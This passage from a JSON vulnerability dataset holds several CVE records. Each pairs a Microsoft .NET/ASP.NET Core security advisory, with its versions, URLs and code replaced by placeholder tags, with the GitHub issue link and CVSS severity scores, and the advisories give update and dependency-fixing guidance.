Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at APITAG and APITAG , respectively. The Announcements repo for each product ( APITAG and APITAG ) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87473. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87474. "severity": "HIGH",
  87475. "baseScore": 7.5,
  87476. "impactScore": 3.6,
  87477. "exploitabilityScore": 3.9
  87478. },
  87479. {
  87480. "CVE_ID": "CVE-2021-26701",
  87481. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/178",
  87482. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/178",
  87483. "Repo_new": "dotnet/announcements",
  87484. "Issue_Created_At": "2021-03-09T18:01:29Z",
  87485. "description": "Microsoft Security Advisory CVETAG | .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A remote code execution vulnerability exists in .NET NUMBERTAG and .NET Core due to how text encoding is performed. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software The vulnerable package is FILETAG . Upgrading your package and redeploying your app should be sufficient to address this vulnerability. Vulnerable package versions: Any .NET NUMBERTAG NET Core, or .NET Framework based application that uses the APITAG package with a vulnerable version listed below. Package Name| Vulnerable Versions| Secure Versions : | : : | : FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87486. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87487. "severity": "CRITICAL",
  87488. "baseScore": 9.8,
  87489. "impactScore": 5.9,
  87490. "exploitabilityScore": 3.9
  87491. },
  87492. {
  87493. "CVE_ID": "CVE-2018-8356",
  87494. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/73",
  87495. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/73",
  87496. "Repo_new": "dotnet/announcements",
  87497. "Issue_Created_At": "2018-07-10T17:00:37Z",
  87498. "description": "Microsoft Security Advisory CVETAG : .NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security feature bypass vulnerability that exists when .NET Core does not correctly validate certificates. An attacker who successfully exploited this vulnerability could present an expired certificate when challenged. The update addresses the vulnerability by correcting how .NET Core applications handle certificate validation. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If an application does use Windows Communication Foundation you are not affected. APITAG APITAG Affected software Any .NET Core, or ASP.NET Core based application that uses APITAG with a version of NUMBERTAG or earlier. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? .NET Core projects have two types of dependencies: direct and transitive. You must update your projects using the following instructions to address both types of dependency. APITAG APITAG .NET Core Project formats .NET Core has two different project file formats, depending on what software created the project NUMBERTAG APITAG is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG csproj is the format used in .NET Core NUMBERTAG NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG Direct dependencies Direct dependencies are discoverable by examining your csproj file or your APITAG file. They can be fixed by editing the project file direct dependencies or using APITAG to update the dependency. The APITAG package is not meant to be directly depended on and will not appear in your direct dependency list. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in three ways, depending on your project format project format : In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects OR . By examining the APITAG file contained in the root directory of your project for APITAG based projects. The APITAG and APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. APITAG APITAG Fixing direct dependencies in a csproj based project / Visual Studio NUMBERTAG Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing Direct Dependencies in FILETAG based project / Visual Studio NUMBERTAG Open your APITAG file in your editor. Look for the dependencies section. Below is an example dependencies section: CODETAG This example has three direct dependencies: APITAG , APITAG and APITAG . APITAG is the platform the application targets, you should ignore this. The other packages expose their version to the right of the package name. In our example, our non platform packages are version NUMBERTAG Review your direct dependencies for any instance of the packages and versions listed above. In the example above, there is a direct dependency on a vulnerable package, APITAG version NUMBERTAG To update to the fixed package, change the version number to be the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package versions, save your APITAG file. The dependencies section in our example APITAG would now look as follows: CODETAG If you are using Visual Studio and save your updated APITAG file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. After you've addressed all of your direct dependencies, you must review your transitive dependencies. Discovering and fixing transitive dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json or the the APITAG file project lock json . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG (csproj/VS NUMBERTAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. APITAG APITAG Manually reviewing FILETAG APITAG Open the APITAG file in your editor. We suggest you use an editor that understands json and allows you to collapse and expand nodes to review this file; both Visual Studio and Visual Studio Code provide this functionality. If you are using Visual Studio the APITAG file is \u201cunder\u201d the APITAG file. Click the right pointing triangle, \u25b7, to the left of the APITAG file to expand the solution tree to expose the APITAG file. The following image shows a project with the APITAG file expanded to show the APITAG file. FILETAG Search the APITAG file for the vulnerable packages, using the format APITAG , using each of the package names from the table above. If you find any vulnerable assembly name in your search examine the line on which they are found, the version number is after the APITAG and compare to the vulnerable versions table above. For example a search result that shows APITAG is a reference to NUMBERTAG of APITAG . If your APITAG file includes references to any of the package versions shown above then you will need to fix the transitive dependencies. If you have not found any reference to a vulnerable version of APITAG this means none of your direct dependencies depend on any vulnerable packages or you have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your APITAG file to override the transitive dependency. Open your APITAG and find the dependencies section. For example: CODETAG For each of the vulnerable packages your search returned you must add a direct dependency to the updated version by adding it to the APITAG file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG version NUMBERTAG you would add a reference to the appropriate fixed version NUMBERTAG Edit the APITAG file as follows: CODETAG After you have added direct dependencies to the fixed packages, save your APITAG file. If you are using Visual Studio save your updated APITAG file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependencies. Rebuilding your application Finally you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87499. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  87500. "severity": "MEDIUM",
  87501. "baseScore": 5.5,
  87502. "impactScore": 3.6,
  87503. "exploitabilityScore": 1.8
  87504. },
  87505. {
  87506. "CVE_ID": "CVE-2017-11879",
  87507. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/277",
  87508. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/277",
  87509. "Repo_new": "aspnet/announcements",
  87510. "Issue_Created_At": "2017-11-14T15:24:44Z",
  87511. "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
  87512. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87513. "severity": "HIGH",
  87514. "baseScore": 8.8,
  87515. "impactScore": 5.9,
  87516. "exploitabilityScore": 2.8
  87517. },
  87518. {
  87519. "CVE_ID": "CVE-2020-0602",
  87520. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/402",
  87521. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/402",
  87522. "Repo_new": "aspnet/announcements",
  87523. "Issue_Created_At": "2020-01-14T18:01:27Z",
  87524. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version that is listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you're exposed to the vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages that are shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I fix the issue? First examine the versions of .NET Core you have installed. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG APITAG APITAG Updated runtimes and SDKs For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have multiple runtimes or SDKs installed, you must update all runtimes or SDKs separately. Once you've installed the updated runtime or SDK, restart your apps for the update to take effect. Applications targeting .NET Core runtime Update your runtime and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks then restart your application. Applications targeting .NET Framework First update your .NET Core runtimes and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks . As targeting .NET Framework adds dependencies for various packages, you must update the dependencies your application uses, recompile, and redeploy your application. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you haven't found any reference to any vulnerable packages, this means one of the following: None of your direct dependencies depend on any vulnerable packages. You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Tom Deseyn of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87525. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87526. "severity": "HIGH",
  87527. "baseScore": 7.5,
  87528. "impactScore": 3.6,
  87529. "exploitabilityScore": 3.9
  87530. },
  87531. {
  87532. "CVE_ID": "CVE-2022-24464",
  87533. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/212",
  87534. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/212",
  87535. "Repo_new": "dotnet/announcements",
  87536. "Issue_Created_At": "2022-03-08T18:31:46Z",
  87537. "description": "Microsoft Security Advisory CVETAG | .NET Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET CORE NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a Denial of Service vulnerability, which exists in .NET NUMBERTAG NET NUMBERTAG and .NET CORE NUMBERTAG when parsing certain types of http form requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG APITAG from FILETAG .NET NUMBERTAG and .NET NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgement Lars Eidnes URLTAG with FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87538. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87539. "severity": "HIGH",
  87540. "baseScore": 7.5,
  87541. "impactScore": 3.6,
  87542. "exploitabilityScore": 3.9
  87543. },
  87544. {
  87545. "CVE_ID": "CVE-2021-34485",
  87546. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/196",
  87547. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/196",
  87548. "Repo_new": "dotnet/announcements",
  87549. "Issue_Created_At": "2021-08-10T21:53:06Z",
  87550. "description": "Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. An information disclosure vulnerability exists in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG when dumps created by the tool to collect crash dumps and dumps on demand are created with global read permissions on Linux and APITAG Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open 